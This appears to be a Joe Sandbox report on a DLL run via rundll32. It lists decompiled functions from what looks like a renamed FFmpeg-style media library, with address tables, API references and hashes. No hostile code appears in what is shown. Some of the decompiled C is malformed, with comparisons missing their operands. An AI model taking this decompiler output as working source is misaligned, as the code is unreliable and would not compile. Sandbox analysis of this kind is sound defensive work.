Function 10010320 Relevance: 22.7, APIs: 15, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E10010320(intOrPtr* _a4) {
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t97;
				signed int _t100;
				signed int _t106;
				signed int _t112;
				signed int _t118;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				signed int _t139;
				signed int _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				signed int _t172;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t182;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t199;
				void* _t200;
				intOrPtr* _t201;

				_t188 = 0x100b3200;
				_t201 = _t200 - 0x2c;
				_v40 = 0;
				_t189 = _a4;
				while(1) {
					_v40 = _v40 + 1;
					_t188 = _t188 + 0x40;
					if(_v40 == 0x17) {
						break;
					}
					_t6 = _t188 + 0x10; // 0x1000ffb0
					if( *_t6 == 0) {
						continue;
					} else {
						_t9 = _t188 + 0x10; // 0x1000ffb0
						_t10 = _t188 + 0x14; // 0x10010008
						_t172 =  *_t10;
						 *_t201 =  *((intOrPtr*)(_t189 + 0x10));
						_v56 =  *((intOrPtr*)(_t189 + 0x14));
						_v52 =  *_t9;
						_v48 = _t172;
						_t97 = L10035A10( *((intOrPtr*)(_t189 + 0x14)), _t188, _t189);
						_t147 = _t172;
						_t14 = _t188 + 0x1c; // 0x1000fde8
						_t192 =  <  ? _t97 :  ~_t97;
						_t15 = _t188 + 0x18; // 0x10010060
						_v48 =  *_t14;
						_v52 =  *_t15;
						_t174 =  *((intOrPtr*)(_t189 + 0x1c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x18));
						_v56 = _t174;
						_t100 = L10035A10(_t147, _t188, _t189);
						 *_t201 =  <  ? _t97 :  ~_t97;
						_v56 = _t147;
						_v48 = _t174;
						_t102 =  <  ? _t100 :  ~_t100;
						_v52 =  <  ? _t100 :  ~_t100;
						_t148 = L10035990(_t147, _t189);
						_t24 = _t188 + 0x20; // 0x1000fe50
						_t25 = _t188 + 0x24; // 0x0
						_v52 =  *_t24;
						_v48 =  *_t25;
						_t176 =  *((intOrPtr*)(_t189 + 0x24));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x20));
						_v56 = _t176;
						_t106 = L10035A10(_t148, _t188, _t189);
						 *_t201 = _t148;
						_v56 = _t174;
						_v48 = _t176;
						_t108 =  <  ? _t106 :  ~_t106;
						_v52 =  <  ? _t106 :  ~_t106;
						_t149 = L10035990(_t148, _t189);
						_t34 = _t188 + 0x28; // 0x0
						_t35 = _t188 + 0x2c; // 0x0
						_v52 =  *_t34;
						_v48 =  *_t35;
						_t178 =  *((intOrPtr*)(_t189 + 0x2c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x28));
						_v56 = _t178;
						_t112 = L10035A10(_t149, _t188, _t189);
						 *_t201 = _t149;
						_v56 = _t176;
						_v48 = _t178;
						_t114 =  <  ? _t112 :  ~_t112;
						_v52 =  <  ? _t112 :  ~_t112;
						_t150 = L10035990(_t149, _t189);
						_t44 = _t188 + 0x30; // 0x0
						_t45 = _t188 + 0x34; // 0x0
						_v52 =  *_t44;
						_v48 =  *_t45;
						_t180 =  *((intOrPtr*)(_t189 + 0x34));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x30));
						_v56 = _t180;
						_t118 = L10035A10(_t150, _t188, _t189);
						 *_t201 = _t150;
						_v56 = _t178;
						_v48 = _t180;
						_t120 =  <  ? _t118 :  ~_t118;
						_v52 =  <  ? _t118 :  ~_t118;
						_t151 = L10035990(_t150, _t189);
						_t54 = _t188 + 0x38; // 0x0
						_t55 = _t188 + 0x3c; // 0x0
						_v52 =  *_t54;
						_v48 =  *_t55;
						_t182 =  *((intOrPtr*)(_t189 + 0x3c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x38));
						_v56 = _t182;
						_t124 = L10035A10(_t151, _t188, _t189);
						 *_t201 = _t151;
						_v56 = _t180;
						_v48 = _t182;
						_t126 =  <  ? _t124 :  ~_t124;
						_v52 =  <  ? _t124 :  ~_t124;
						_t152 = L10035990(_t151, _t189);
						_t64 = _t188 + 4; // 0x1000fea8
						_v52 =  *_t188;
						_v48 =  *_t64;
						_t184 =  *(_t189 + 4);
						 *_t201 =  *_t189;
						_v56 = _t184;
						_t130 = L10035A10(_t152, _t188, _t189);
						 *_t201 = _t152;
						_v56 = _t182;
						_v48 = _t184;
						_t132 =  <  ? _t130 :  ~_t130;
						_v52 =  <  ? _t130 :  ~_t130;
						_t153 = L10035990(_t152, _t189);
						_t72 = _t188 + 8; // 0x1000ff00
						_t73 = _t188 + 0xc; // 0x1000ff58
						_v52 =  *_t72;
						_v48 =  *_t73;
						_t186 =  *(_t189 + 0xc);
						 *_t201 =  *((intOrPtr*)(_t189 + 8));
						_v56 = _t186;
						_t136 = L10035A10(_t153, _t188, _t189);
						 *_t201 = _t153;
						_v56 = _t184;
						_v48 = _t186;
						_t138 =  <  ? _t136 :  ~_t136;
						_v52 =  <  ? _t136 :  ~_t136;
						_t139 = L10035990(_t153, _t189);
						_v36 = _t186;
						_t154 = _t139;
						_t199 = _t186;
						_v32 = _t186 >> 0x1f;
						_t187 = 0x3e8 * _t154 >> 0x20;
						asm("sbb edx, [esp+0x1c]");
						if((_t187 | 0x000003e8 * _t154 - _v36) != 0) {
							_t158 = (_v32 ^ _t187) >> 0x0000001f | 0x00000001;
							goto L7;
						} else {
							if(_t199 != 0) {
								continue;
							} else {
								if(_t154 == 0) {
									L8:
									return _v40;
								} else {
									_t158 = _t154 >> 0x1f;
									L7:
									if(_t158 + 1 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
						}
					}
					L11:
				}
				_v40 = 2;
				return _v40;
				goto L11;
			}

0x10010324
0x1001032b
0x1001032e
0x10010332
0x10010340
0x10010340
0x10010344
0x1001034e
0x00000000
0x00000000
0x10010354
0x10010359
0x00000000
0x1001035b
0x10010361
0x10010364
0x10010364
0x10010367
0x1001036a
0x1001036e
0x10010372
0x10010376
0x1001037d
0x1001037f
0x10010384
0x10010387
0x1001038a
0x1001038e
0x10010395
0x10010398
0x1001039b
0x1001039f
0x100103a4
0x100103a7
0x100103ab
0x100103b3
0x100103b6
0x100103bf
0x100103c3
0x100103c6
0x100103c9
0x100103cd
0x100103d4
0x100103d7
0x100103da
0x100103de
0x100103e3
0x100103e6
0x100103ea
0x100103f2
0x100103f5
0x100103fe
0x10010402
0x10010405
0x10010408
0x1001040c
0x10010413
0x10010416
0x10010419
0x1001041d
0x10010422
0x10010425
0x10010429
0x10010431
0x10010434
0x1001043d
0x10010441
0x10010444
0x10010447
0x1001044b
0x10010452
0x10010455
0x10010458
0x1001045c
0x10010461
0x10010464
0x10010468
0x10010470
0x10010473
0x1001047c
0x10010480
0x10010483
0x10010486
0x1001048a
0x10010491
0x10010494
0x10010497
0x1001049b
0x100104a0
0x100104a3
0x100104a7
0x100104af
0x100104b2
0x100104bb
0x100104c1
0x100104c4
0x100104c8
0x100104ce
0x100104d1
0x100104d4
0x100104d8
0x100104dd
0x100104e0
0x100104e4
0x100104ec
0x100104ef
0x100104f8
0x100104fc
0x100104ff
0x10010502
0x10010506
0x1001050d
0x10010510
0x10010513
0x10010517
0x1001051c
0x1001051f
0x10010523
0x1001052b
0x1001052e
0x10010532
0x10010537
0x1001053b
0x10010542
0x10010544
0x1001054d
0x10010553
0x1001055b
0x10010591
0x00000000
0x1001055d
0x1001055f
0x00000000
0x10010565
0x10010567
0x10010576
0x10010581
0x10010569
0x10010569
0x1001056c
0x10010570
0x00000000
0x00000000
0x00000000
0x00000000
0x10010570
0x10010567
0x1001055f
0x1001055b
0x00000000
0x10010359
0x100105a5
0x100105b4
0x00000000

APIs

mv_sub_q.F086 ref: 10010376
mv_sub_q.F086 ref: 1001039F
mv_add_q.F086 ref: 100103BA
mv_sub_q.F086 ref: 100103DE
mv_add_q.F086 ref: 100103F9
mv_sub_q.F086 ref: 1001041D
mv_add_q.F086 ref: 10010438
mv_sub_q.F086 ref: 1001045C
mv_add_q.F086 ref: 10010477
mv_sub_q.F086 ref: 1001049B
mv_add_q.F086 ref: 100104B6

Part of subcall function 10035990: mv_reduce.F086(?,?), ref: 100359E9

mv_sub_q.F086 ref: 100104D8

Part of subcall function 10035A10: mv_reduce.F086(?), ref: 10035A81

mv_add_q.F086 ref: 100104F3
mv_sub_q.F086 ref: 10010517
mv_add_q.F086 ref: 10010532

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_sub_q$mv_add_q$mv_reduce
String ID:
API String ID: 416313997-0
Opcode ID: fd26de4a70a645a75b6084fdddd25abeecc13d0e1f18b84e77e2c88ea45aa38b
Instruction ID: 2bd5eacdd0496173cebd80a3581587597599a29e230854eb82bb207fe0e5f862
Opcode Fuzzy Hash: fd26de4a70a645a75b6084fdddd25abeecc13d0e1f18b84e77e2c88ea45aa38b
Instruction Fuzzy Hash: 0281A1B4A08B069FC748DF6AD18051AFBE1FF88211F50C92EE59DC7721E670E8519F82

Uniqueness

Uniqueness Score: -1.00%

Function 10034473 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 87stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 10034497
strcmp.MSVCRT ref: 100344AC
strcmp.MSVCRT ref: 100344FC

Strings

bgr32, xrefs: 100344A3
rgb32, xrefs: 10034483
bgra, xrefs: 10034510
%s%s, xrefs: 1003451C
rgba, xrefs: 100344B3
yuv420p, xrefs: 100344C0, 10034544

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp
String ID: %s%s$bgr32$bgra$rgb32$rgba$yuv420p
API String ID: 1004003707-3566121812
Opcode ID: 9550c25b13b3c51ea765e66f3a5b83d88c901e3b85b8e96a12ffededae0969d6
Instruction ID: 807c7c8d8e474d4a4436a7f9c776c039c9797f57d3ea9103522d9848d4e2685b
Opcode Fuzzy Hash: 9550c25b13b3c51ea765e66f3a5b83d88c901e3b85b8e96a12ffededae0969d6
Instruction Fuzzy Hash: EA314179E087559BC701DF69848435EB6D4FF84785F43882EE989DF301EA78EC009B81

Uniqueness

Uniqueness Score: -1.00%

Function 1001A460 Relevance: 19.6, APIs: 13, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1001A460(signed char __eax) {
				void* __ebx;
				void* __esi;
				void* _t68;
				intOrPtr _t74;
				signed char _t79;
				signed char _t82;
				char* _t83;
				intOrPtr _t85;
				signed int _t86;
				signed int _t89;
				intOrPtr _t90;
				signed int _t92;
				signed int _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr* _t100;

				_t79 = __eax;
				_t100 = _t99 - 0x1c;
				if( *((intOrPtr*)(__eax + 0xe4)) > 0) {
					_t89 = 0;
					do {
						_t98 =  *((intOrPtr*)(__eax + 0xe0)) + _t89 * 4;
						_t89 = _t89 + 1;
						_t95 =  *_t98;
						_t96 = _t95 + 0xc;
						 *_t100 = _t95 + 0x10;
						E1000A000(__eax, _t96);
						 *_t100 = _t96;
						L10011CC0();
						 *_t100 = _t98;
						E100290E0();
					} while (_t89 <  *((intOrPtr*)(_t79 + 0xe4)));
				}
				_t90 = _t79 + 0xb8;
				 *((intOrPtr*)(_t79 + 0xe4)) = 0;
				 *_t100 = _t79 + 0xe0;
				_t85 = _t79 + 0xd8;
				E100290E0();
				do {
					 *_t100 = _t90;
					_t90 = _t90 + 4;
					E1000A000(_t79, _t90);
				} while (_t85 != _t90);
				if( *((intOrPtr*)(_t79 + 0xdc)) > 0) {
					_t94 = 0;
					do {
						_t74 =  *((intOrPtr*)(_t79 + 0xd8)) + _t94 * 4;
						_t94 = _t94 + 1;
						 *_t100 = _t74;
						E1000A000(_t79, _t94);
					} while (_t94 <  *((intOrPtr*)(_t79 + 0xdc)));
				}
				 *_t100 = _t85;
				E100290E0();
				 *_t100 = _t79 + 0x118;
				L10011CC0();
				 *_t100 = _t79 + 0x128;
				E1000A000(_t79, _t90);
				 *_t100 = _t79 + 0x12c;
				E1000A000(_t79, _t90);
				 *_t100 = _t79 + 0x140;
				E1000A000(_t79, _t90);
				if( *(_t79 + 0x40) != _t79) {
					 *_t100 = _t79 + 0x40;
					E100290E0();
				}
				_t86 = 0x168;
				 *_t100 = _t79 + 0x148;
				E1000D270();
				_t82 = _t79;
				if((_t79 & 0x00000001) != 0) {
					 *_t79 = 0;
					_t82 = _t79 + 1;
					_t86 = 0x167;
					if((_t82 & 0x00000002) == 0) {
						goto L12;
					} else {
						goto L20;
					}
					L14:
					_t83 = _t82 + _t68;
					if((_t86 & 0x00000004) != 0) {
						 *_t83 = 0;
						_t83 = _t83 + 4;
					}
					if((_t86 & 0x00000002) != 0) {
						 *_t83 = 0;
						_t83 = _t83 + 2;
					}
					if((_t86 & 0x00000001) != 0) {
						 *_t83 = 0;
					}
					 *((intOrPtr*)(_t79 + 0x100)) = 0;
					 *((intOrPtr*)(_t79 + 0xf4)) = 2;
					 *((intOrPtr*)(_t79 + 0x70)) = 0;
					 *((intOrPtr*)(_t79 + 0x74)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x68)) = 0;
					 *((intOrPtr*)(_t79 + 0x6c)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x104)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x108)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x10c)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x124)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x7c)) = 1;
					 *((intOrPtr*)(_t79 + 0x54)) = 1;
					 *((intOrPtr*)(_t79 + 0x60)) = 1;
					 *((intOrPtr*)(_t79 + 0x50)) = 0xffffffff;
					 *(_t79 + 0x40) = _t79;
					 *((intOrPtr*)(_t79 + 0xf0)) = 2;
					 *((intOrPtr*)(_t79 + 0xf8)) = 2;
					return 2;
				} else {
					if((_t82 & 0x00000002) != 0) {
						L20:
						 *_t82 = 0;
						_t86 = _t86 - 2;
						_t82 = _t82 + 2;
					}
				}
				L12:
				_t68 = 0;
				_t92 = _t86 & 0xfffffff8;
				do {
					 *((intOrPtr*)(_t82 + _t68)) = 0;
					 *((intOrPtr*)(_t82 + _t68 + 4)) = 0;
					_t68 = _t68 + 8;
				} while (_t68 < _t92);
				goto L14;
			}

0x1001a464
0x1001a466
0x1001a471
0x1001a473
0x1001a480
0x1001a486
0x1001a489
0x1001a48a
0x1001a490
0x1001a493
0x1001a496
0x1001a49b
0x1001a49e
0x1001a4a3
0x1001a4a6
0x1001a4ab
0x1001a480
0x1001a4b3
0x1001a4bb
0x1001a4c7
0x1001a4ca
0x1001a4d0
0x1001a4e0
0x1001a4e0
0x1001a4e3
0x1001a4e6
0x1001a4eb
0x1001a4f7
0x1001a4f9
0x1001a500
0x1001a506
0x1001a509
0x1001a50a
0x1001a50d
0x1001a512
0x1001a500
0x1001a51a
0x1001a51d
0x1001a528
0x1001a52b
0x1001a536
0x1001a539
0x1001a544
0x1001a547
0x1001a552
0x1001a555
0x1001a55d
0x1001a562
0x1001a565
0x1001a565
0x1001a570
0x1001a575
0x1001a578
0x1001a582
0x1001a584
0x1001a668
0x1001a66b
0x1001a66e
0x1001a676
0x00000000
0x00000000
0x00000000
0x00000000
0x1001a5a8
0x1001a5a8
0x1001a5b0
0x1001a6a5
0x1001a6ab
0x1001a6ab
0x1001a5bc
0x1001a698
0x1001a69d
0x1001a69d
0x1001a5c5
0x1001a690
0x1001a690
0x1001a5d2
0x1001a5e2
0x1001a5f2
0x1001a603
0x1001a60a
0x1001a611
0x1001a618
0x1001a61e
0x1001a624
0x1001a62a
0x1001a630
0x1001a637
0x1001a63e
0x1001a645
0x1001a64c
0x1001a64f
0x1001a655
0x1001a662
0x1001a58a
0x1001a58d
0x1001a680
0x1001a680
0x1001a685
0x1001a688
0x1001a688
0x1001a58d
0x1001a593
0x1001a595
0x1001a597
0x1001a59a
0x1001a59a
0x1001a59d
0x1001a5a1
0x1001a5a4
0x00000000

APIs

mv_dict_free.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A49E
mv_freep.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A4A6
mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A496

Part of subcall function 1000A000: mv_freep.F086 ref: 1000A01E

mv_freep.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A4D0
mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A4E6
mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A50D
mv_freep.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A51D
mv_dict_free.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A52B
mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A539
mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A547
mv_buffer_unref.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A555
mv_freep.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A565
mv_channel_layout_uninit.F086(?,?,?,?,?,?,1001ADCA), ref: 1001A578

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_unref$mv_freep$mv_dict_free$mv_channel_layout_uninit
String ID:
API String ID: 1735483532-0
Opcode ID: b1f051f397a595c89fd00aa7c4bdbf0e8165c123e935fbb0ada5b3fbc138a149
Instruction ID: e5137f4a5bc7018b3bf66a3982d40490682209c4fe07239027ca6129b2817d8d
Opcode Fuzzy Hash: b1f051f397a595c89fd00aa7c4bdbf0e8165c123e935fbb0ada5b3fbc138a149
Instruction Fuzzy Hash: 66516BB19046068BDB10DF28C48178A77E5FF45364F0A46BADC989F38AD774E8C5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C640 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 1000C650
memcmp.MSVCRT ref: 1000C6F4

Strings

mono, xrefs: 1000C6B0

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: memcmpstrlen
String ID: mono
API String ID: 3108337309-2381334079
Opcode ID: 961e4d7430c6ee58c8d49aecf6a6276b133ce91f2d562b03286109f610fa6c8a
Instruction ID: 18b6b574f71558c9a9b0b92199a84ecc10b2be927aad7e864a8dbdfaab720d03
Opcode Fuzzy Hash: 961e4d7430c6ee58c8d49aecf6a6276b133ce91f2d562b03286109f610fa6c8a
Instruction Fuzzy Hash: 62713A74A083598FD354DF25C48491EBBE2FFC8384F51892DE88997319DB34E9458F86

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1D0 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

mv_realloc.F086 ref: 1000A231
mv_mallocz.F086 ref: 1000A24B
mv_mallocz.F086 ref: 1000A284
mv_freep.F086 ref: 1000A2DA
mv_realloc.F086 ref: 1000A344
mv_realloc.F086 ref: 1000A36B
mv_mallocz.F086 ref: 1000A385
mv_mallocz.F086 ref: 1000A3BC

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$mv_realloc$mv_freep
String ID:
API String ID: 3944475926-0
Opcode ID: a6fa4d2bae3b4a2bda0a35254eb544c858f4501f780d02fc74c31e633d2e6906
Instruction ID: 0671ab7339bb216cd2d01b0f004d479de4b058bf66c6df6044412f8339b3df2e
Opcode Fuzzy Hash: a6fa4d2bae3b4a2bda0a35254eb544c858f4501f780d02fc74c31e633d2e6906
Instruction Fuzzy Hash: 937104B48087018FE714DF25C18471AFBE0FF86380F568A6DE9898B365D775E980CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1001E690 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E1001E690(intOrPtr _a4, char _a8) {
				char _v16;
				intOrPtr _v32;
				intOrPtr _v48;
				char* _v52;
				char _v56;
				void* __ebx;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				char _t46;
				intOrPtr _t49;
				char _t58;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr* _t73;

				_t73 = _t72 - 0x34;
				_t37 = _a4;
				_t58 = _a8;
				_t71 =  *((intOrPtr*)(_t37 + 4));
				_t63 =  *((intOrPtr*)(_t71 + 4));
				_t61 =  *((intOrPtr*)(_t63 + 0xc));
				if( *((intOrPtr*)(_t63 + 0xc)) == 0) {
					_t64 =  *_t63;
					_t62 =  *((intOrPtr*)(_t64 + 0x3c));
					if( *((intOrPtr*)(_t64 + 0x3c)) == 0) {
						_t38 = 0xffffffd8;
						goto L7;
					} else {
						if( *((intOrPtr*)(_t71 + 0x1c)) == 0) {
							_t38 = 0xffffffea;
							goto L7;
						} else {
							 *_t73 = _t37;
							_t39 = L10009FC0(_t58, _t62);
							 *((intOrPtr*)(_t58 + 0x128)) = _t39;
							if(_t39 == 0) {
								goto L6;
							} else {
								_v56 = _t58;
								 *_t73 = _t71;
								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)))) + 0x3c))();
								if(_t42 < 0) {
									_v32 = _t42;
									 *_t73 = _t58 + 0x128;
									E1000A000(_t58 + 0x128, _t71);
									_t38 = _v32;
									goto L7;
								} else {
									 *((intOrPtr*)(_t58 + 0x40)) = _t58;
									return 0;
								}
							}
						}
					}
				} else {
					 *((intOrPtr*)(_t58 + 0x50)) =  *((intOrPtr*)(_t71 + 0x24));
					 *_t73 = _t37;
					_t45 = L10009FC0(_t58, _t61);
					 *((intOrPtr*)(_t58 + 0x128)) = _t45;
					if(_t45 == 0) {
						L6:
						_t38 = 0xfffffff4;
						goto L7;
					} else {
						_t46 = L1001AC40(_t58, _t70, _t71);
						_v16 = _t46;
						if(_t46 == 0) {
							goto L6;
						} else {
							_v56 = _t46;
							_v52 = 0;
							 *_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0xc));
							_t49 = E1001E690();
							if(_t49 < 0) {
								L13:
								_v32 = _t49;
								 *_t73 =  &_v16;
								L1001ADB0(_t58);
								return _v32;
							} else {
								 *_t73 = _t58;
								_v52 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0x10));
								_v56 = _v16;
								_t49 = E1001E450(_t58, _t70, _t71);
								if(_t49 == 0) {
									goto L13;
								} else {
									_v48 = _t49;
									_v32 = _t49;
									_v56 = 0x10;
									_v52 = "Failed to map frame into derived frame context: %d.\n";
									 *_t73 = _t71;
									E10026560();
									 *_t73 =  &_v16;
									L1001ADB0("Failed to map frame into derived frame context: %d.\n");
									_t38 = _v32;
									L7:
									return _t38;
								}
							}
						}
					}
				}
			}

0x1001e692
0x1001e695
0x1001e699
0x1001e69d
0x1001e6a0
0x1001e6a3
0x1001e6a8
0x1001e760
0x1001e762
0x1001e767
0x1001e7e5
0x00000000
0x1001e769
0x1001e76e
0x1001e7db
0x00000000
0x1001e770
0x1001e770
0x1001e773
0x1001e778
0x1001e780
0x00000000
0x1001e782
0x1001e787
0x1001e78b
0x1001e78e
0x1001e793
0x1001e7c0
0x1001e7ca
0x1001e7cd
0x1001e7d2
0x00000000
0x1001e795
0x1001e795
0x1001e79f
0x1001e79f
0x1001e793
0x1001e780
0x1001e76e
0x1001e6ae
0x1001e6b1
0x1001e6b4
0x1001e6b7
0x1001e6bc
0x1001e6c4
0x1001e750
0x1001e750
0x00000000
0x1001e6ca
0x1001e6ca
0x1001e6cf
0x1001e6d5
0x00000000
0x1001e6d7
0x1001e6d7
0x1001e6dd
0x1001e6e7
0x1001e6ea
0x1001e6f1
0x1001e7a0
0x1001e7a0
0x1001e7a8
0x1001e7ab
0x1001e7b9
0x1001e6f7
0x1001e6fd
0x1001e700
0x1001e708
0x1001e70c
0x1001e713
0x00000000
0x1001e719
0x1001e719
0x1001e722
0x1001e72b
0x1001e72f
0x1001e733
0x1001e736
0x1001e73f
0x1001e742
0x1001e747
0x1001e755
0x1001e75a
0x1001e75a
0x1001e713
0x1001e6f1
0x1001e6d5
0x1001e6c4

APIs

mv_frame_alloc.F086(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6CA

Part of subcall function 1001AC40: mv_malloc.F086 ref: 1001AC56

